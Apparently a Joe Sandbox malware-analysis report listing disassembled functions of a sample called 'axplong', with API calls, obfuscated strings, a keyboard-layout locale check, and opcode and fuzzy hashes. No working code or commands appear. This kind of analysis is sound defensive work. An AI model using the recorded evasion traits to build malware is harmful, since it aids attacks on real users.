Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 398d68f34de90ce8da37be5e7b3fa91866df0270baf8eea78914053b77884cd0
Instruction ID: 508f2eeda7e6c8e51770a9f61a82ebf2849b3396e75d46b837f1ff832742c0d5
Opcode Fuzzy Hash: 398d68f34de90ce8da37be5e7b3fa91866df0270baf8eea78914053b77884cd0
Instruction Fuzzy Hash: B0E1AD7190021CABEB24DFA4CC88BEEB7B9AB14304F5042D9E508A7691DB75ABC4DF51

Function 000F7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000F7EA3

Strings

JmpxRL==, xrefs: 000F8062
JmpyPb==, xrefs: 000F810A
JmpxQb==, xrefs: 000F81B2

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 7f9d1c0be54fd7128ff687646ab9dccd722eadb226a85a5f1d97fdf8befcf3d7
Instruction ID: 1e0a85657046eb3884094921424e67d28f19d12c47f95ec0cffa652666af1b59
Opcode Fuzzy Hash: 7f9d1c0be54fd7128ff687646ab9dccd722eadb226a85a5f1d97fdf8befcf3d7
Instruction Fuzzy Hash: D1D13871E00618DBDF24FB28CC4A3ED7B71AB42314F504288E9156B7C2DB749E949BD2

Function 00126E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00126E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00126E7D
__dosmaperr.LIBCMT ref: 00126F12

Part of subcall function 00127177: __dosmaperr.LIBCMT ref: 001271AC

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 7cf5cbfa678abeedea92089920dc1370f4c90137d721ad80ba216f1ee5c3679d
Instruction ID: 3816a2b8f59ec03375ccb313d64b1562366a5112e5b99eba448f24a466354876
Opcode Fuzzy Hash: 7cf5cbfa678abeedea92089920dc1370f4c90137d721ad80ba216f1ee5c3679d
Instruction Fuzzy Hash: FA415D75900354AADF28EFB5ED519ABBBF9EF59300B10452DF456D3290EB30A914CB60

Function 000F82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 000F8454

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 0c3881094c550e16dc6f24c356bd1aa6225bd091358814616def42bd9e3bb6d6
Instruction ID: 75b9007aab0d8d8014938f44f567f88a817636bbcaed8c72a8623d788ae472d1
Opcode Fuzzy Hash: 0c3881094c550e16dc6f24c356bd1aa6225bd091358814616def42bd9e3bb6d6
Instruction Fuzzy Hash: C3513971D0421C9BEB24EB78CD497EEBB75EB45310F508299E904A76D1EF30AA80DB91

Function 00126C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc0fe16d1aa76dee52ecd30027ef55cb1084d9a3398094f0ba937423c3656a4
Instruction ID: d1d783e7926d416ffaed86a00079fd6261e0ca3264bbdf6389b46531769bc455
Opcode Fuzzy Hash: 5fc0fe16d1aa76dee52ecd30027ef55cb1084d9a3398094f0ba937423c3656a4
Instruction Fuzzy Hash: 2F21F572A0526C7EEB11BBA4BC42B9F37299F42378F214310F9643B1D1DB706E2596A1

Function 00126F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00126FB3

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: ccfb4031e992925ae81aab51bb511cdd14537f2590cfaa65cdd7ace61fa9d3dc
Instruction ID: 2afeebcd3688dda36512b526155033b7997b47cc33a85200f8473650b548a3b3
Opcode Fuzzy Hash: ccfb4031e992925ae81aab51bb511cdd14537f2590cfaa65cdd7ace61fa9d3dc
Instruction Fuzzy Hash: 7811DAB290020DABDF11EA95EA51EDFB7BCAB08710F615266E511E6180EB30EB548B61

Function 00106AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00106B65

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7239d8049a96edf1ed9e1b285dc310e3a9741e4f396b580f5d706dceaba705bb
Instruction ID: 091fbb747a98bf655cd3c22f8503c1929b0c5ff95c95af1050959175322d29fa
Opcode Fuzzy Hash: 7239d8049a96edf1ed9e1b285dc310e3a9741e4f396b580f5d706dceaba705bb
Instruction Fuzzy Hash: 60F0F472E00608EBC701BB789C07B5DBB74AB07761F800348F9216B6E2DB706A1487D3

Function 04AE0CEC Relevance: .1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a7daf374b09bbbf60a02d4bfba0d479f0ddc0de8e29ae998cc667a567bf482
Instruction ID: 74d0ac3aaebd63d94f6a8fbb8f55cec41b2587a3eb2a9cd28c1d6bc52719947d
Opcode Fuzzy Hash: a3a7daf374b09bbbf60a02d4bfba0d479f0ddc0de8e29ae998cc667a567bf482
Instruction Fuzzy Hash: 5A1108F720C1606DA24380A22AE49F63B3DE5D6A31335456BF062C9087E2CAE60F5372

Function 04AE0C09 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249522c540478d3109b78a350663cea73faaef5c376adf0d08cc9c4ffa9fb709
Instruction ID: fd4c33bfe2c65d8e00db499de39a32a166a8a74996659f8dd72cb83ebda91c9a
Opcode Fuzzy Hash: 249522c540478d3109b78a350663cea73faaef5c376adf0d08cc9c4ffa9fb709
Instruction Fuzzy Hash: 82F0C2B231E138FE16424553AB549B62A3DD5D6730331C136F43BCA201F2E4B995B163

Function 04AE0C34 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea35fd63a79092403a96cfc2c2665137294a233e736e977a195cf54b2df5c890
Instruction ID: 6d6154c6e0bbc8ce4aa84b018fe818a1cf9ac19e1988906404336358864ebd1e
Opcode Fuzzy Hash: ea35fd63a79092403a96cfc2c2665137294a233e736e977a195cf54b2df5c890
Instruction Fuzzy Hash: E9F024B230E035EE56025993AB906FA3F39D5D63713318036F877CA142F3E0A646B163

Function 04AE0C5D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2706933bc64fb6e1570e07c6618a51de923af8a35e16906c88c68a45a15e615e
Instruction ID: 05d6821693f8558e9875a019a6f31462e1c4fa9295654c87dcfea6aada187312
Opcode Fuzzy Hash: 2706933bc64fb6e1570e07c6618a51de923af8a35e16906c88c68a45a15e615e
Instruction Fuzzy Hash: 80F0277130E138FE474669A786906F63A7A6AD63307208038F4378B146F3E1B184B153

Function 04AE0C4A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f8f7e907c39e1bbb30f88d96ef4587c0024be78d75aee4761371e6b654d25d
Instruction ID: 0b4193897c0f64aea162f7b5a333c3ebb458f4432c5c86fbfafe587c120aaede
Opcode Fuzzy Hash: 88f8f7e907c39e1bbb30f88d96ef4587c0024be78d75aee4761371e6b654d25d
Instruction Fuzzy Hash: C3F0277130E138FE4A02596396519B13E39A5C23307248536F4778A501F3E0B145F113

Function 04AE0C78 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9babf38b0d2a99921023c151e1186a942e467a37aeabd03f232a1b4d3f12502b
Instruction ID: 0a0711d7314a5b6612bbd8fb4765c61dd13ca118a75e1aaace44b3339b307bcd
Opcode Fuzzy Hash: 9babf38b0d2a99921023c151e1186a942e467a37aeabd03f232a1b4d3f12502b
Instruction Fuzzy Hash: E0E0207134E138FE4A465AA783905F43E366B96331731C135F47789141B3E0B194F543

Function 04AE0C81 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb91fe30701507bc486b2850bbc8c9454c8685d5e3ebf21a576610e4c383f63d
Instruction ID: 7f187c9217be67e2c17e69f90a6d5c863bd6fed94bb434ca175b96d44d65434e
Opcode Fuzzy Hash: fb91fe30701507bc486b2850bbc8c9454c8685d5e3ebf21a576610e4c383f63d
Instruction Fuzzy Hash: 47E0D83124E13CEB4A462E6786905F53D3A7E56371721C129F47745245B7E06154F683

Function 04AE0C8F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108942a155164b9cd67f69868e97ef21226f37adb09003402e958d5eb1e3c8e7
Instruction ID: 686488667e0af6725ad089ae94782f3798d65d7fdd27f4d08f9501ffc67a1791
Opcode Fuzzy Hash: 108942a155164b9cd67f69868e97ef21226f37adb09003402e958d5eb1e3c8e7
Instruction Fuzzy Hash: 70E0267214D038FA8B061A6B83A06F13D366A5A330322C229F03B4664672F1B248F903

Function 04AE0C97 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a2ae0f38048e4b3ae382daf530367d0390705b75d7fca2b845dc08da83d725
Instruction ID: 59a43b900e09caf9ddf8e77b9d7424ed050a50f8788036a1c81327be5d286a6b
Opcode Fuzzy Hash: 12a2ae0f38048e4b3ae382daf530367d0390705b75d7fca2b845dc08da83d725
Instruction Fuzzy Hash: 44E0263120D038F98A4A1F6B82905B07E366A26330324C625F47744502B7F1B260FB03

Function 04AE0CBF Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cfaff71f6c1252fb33ea60f352cfb6fcfae6f8d201c5e83655331edd420a18a
Instruction ID: 55673c219903ed44d423d2c18c1e8873ae2e07718246f48a716e46eedf189d59
Opcode Fuzzy Hash: 9cfaff71f6c1252fb33ea60f352cfb6fcfae6f8d201c5e83655331edd420a18a
Instruction Fuzzy Hash: D4D05E3118E028EE8A461AA78A816F57A36BB16331724C125F4BB41181ABB16154F613

Function 04AE0CCF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3333918254.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4ae0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fad0d7819f677aba996d5be1dc715b89db07ab93517392a67a612ee1f7c8b31
Instruction ID: 718968973ae51b42e9f41bc48a1ea0ca2571361e6496a440baf6ff4907dc549c
Opcode Fuzzy Hash: 9fad0d7819f677aba996d5be1dc715b89db07ab93517392a67a612ee1f7c8b31
Instruction Fuzzy Hash: A0D0237114C178CD8B4366BB05407787D716B56360739C439F4B7430C566D07001F103

Non-executed Functions

Function 000FE440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON

Download Yara Rule

Strings

#, xrefs: 00100534
UD==, xrefs: 000FEA1F, 000FEC66
MT==, xrefs: 000FE4A5
WWt=, xrefs: 0010088D
fed3aa, xrefs: 000FFA9E
WGt=, xrefs: 000FF62D, 000FF90A
111, xrefs: 000FF6B0
GqKudSO2, xrefs: 000FE47F
WWp=, xrefs: 001004DA
MJB+, xrefs: 000FE734
246122658369, xrefs: 000FF647, 000FF924, 001004F7, 001008AA

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: 51a9fc28b860ac2d783992a086a6299d3d9ec7a30f32ca451a18647f1d3470db
Instruction ID: 4b994f666ffa8a734386490f6b8d32fbf985e933f90af0969a7b7ebffe8eb9ee
Opcode Fuzzy Hash: 51a9fc28b860ac2d783992a086a6299d3d9ec7a30f32ca451a18647f1d3470db
Instruction Fuzzy Hash: 5482D47090428CDBEF14EF64C9497DDBFB2AB56304F508199E8456B3C2C7B59A88CBD2

Function 00133068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001331E3

Strings

1#QNAN, xrefs: 00134381
1#IND, xrefs: 00134373
1#INF, xrefs: 0013439E
1#SNAN, xrefs: 0013437A

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: da4a7985282bade727f49110a867ff25dc39ef88673a3d67efb64ae6d5f7ad81
Instruction ID: 4c0074e6fe60b669b693cdd7fdce796d813a8cd342b8d7f524364263c9b3c10f
Opcode Fuzzy Hash: da4a7985282bade727f49110a867ff25dc39ef88673a3d67efb64ae6d5f7ad81
Instruction Fuzzy Hash: 1AC25B71E086288FDB29CE28DD407EAB7B5FB48305F1541EAD85DE7240E778AE858F44

Function 00132BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: f2909484c65308e547ebf190536207fb0b22a7d7b508b1db04aa817ee276a565
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 68F14071E002199FDF18DFA8C8906AEF7B5FF48314F258269E919A7344D731AE41CB94

Function 0010CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0010CE82,?,?,?,?,0010CEB7,?,?,?,?,?,?,0010C42D,?,00000001), ref: 0010CB33

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
